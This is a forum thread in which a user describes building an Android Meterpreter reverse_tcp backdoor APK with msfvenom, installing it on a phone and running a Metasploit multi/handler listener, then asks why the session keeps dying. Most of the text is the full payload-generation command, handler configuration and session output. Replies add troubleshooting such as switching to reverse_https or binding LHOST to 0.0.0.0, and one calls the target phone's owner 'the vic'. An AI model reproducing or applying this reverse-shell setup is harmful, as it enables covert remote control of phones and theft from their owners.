Hi,
I'm looking for help in order to progress in my understanding of the use of Meterpreter over Android on a smartphone.
I currently have Kali 4.11 and the Metasploit suite on the attacker computer.
I also generated my Meterpreter payload using the following command:
msfvenom -p android/meterpreter/reverse_tcp LHOST=MY_WAN_IP_ADDRESS LPORT=4444 -a dalvik --platform android R -o /pentest-001.apk
Then I installed my payload over the Android 6.0.1 smartphone (a Lenovo P2) and I can see the MainActivity software installed.
Then, on the attacker computer, I typed (see bold):
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST MY_LAN_IP_ADDRESS
LHOST => MY_LAN_IP_ADDRESS
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
* Exploit running as background job 0.
From there, I start MainActivity on my smartphone (connected using 4G/LTE): I can see the following being printed on the attacker computer.
msf exploit(handler) >
* Sending stage (68925 bytes) to MY_WAN_IP_ADDRESS
* Meterpreter session 1 opened (MY_LAN_IP_ADDRESS:4444 -> MY_WAN_IP_ADDRESS:11501) at 2017-08-31 13:55:56 +0200
* negotiating tlv encryption
* negotiated tlv encryption
* negotiated tlv encryption
* MY_WAN_IP_ADDRESS - Meterpreter session 1 closed. Reason: Died
I can repeat the operation on and on; I never get the Meterpreter shell. I tried on different smartphones, BTW.
One precision: my attacker computer is behind 2 routers. Both routers forward port 4444 (the first one forwards to the 2nd router, and the 2nd router forwards to MY_LAN_IP_ADDRESS).
I also tested using port 443.
Thanks in advance for your help.
6 Responses
I also tested with only one router....
Change the WAN IP with your LAN IP address.
Same problem in LAN.
I am also getting the same problem. Can you tell us what the reason is?
Hey there.
I've got msf installed on my phone in Termux. I tried exploiting said phone but every time I opened Termux to use the session it would die. I could only imagine it was cause the backdoor wasn't persistent or being run as a service or anything so it wouldn't run in the background. Just a theory cause I was able to run the listener on my computer no problem.
Point is, maybe you're having a similar issue. Maybe the vic is doing something that's killing the session.
Most phones have a setting in them to kill the wifi to save battery when the phone goes to sleep. They may even just kill idle processes...
Maybe that's causing it.
Just a thought, it's probably a long shot tho.
I've also heard of people just using reverse_https instead. If all else fails I'd scrap the apk and try, try again lol
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit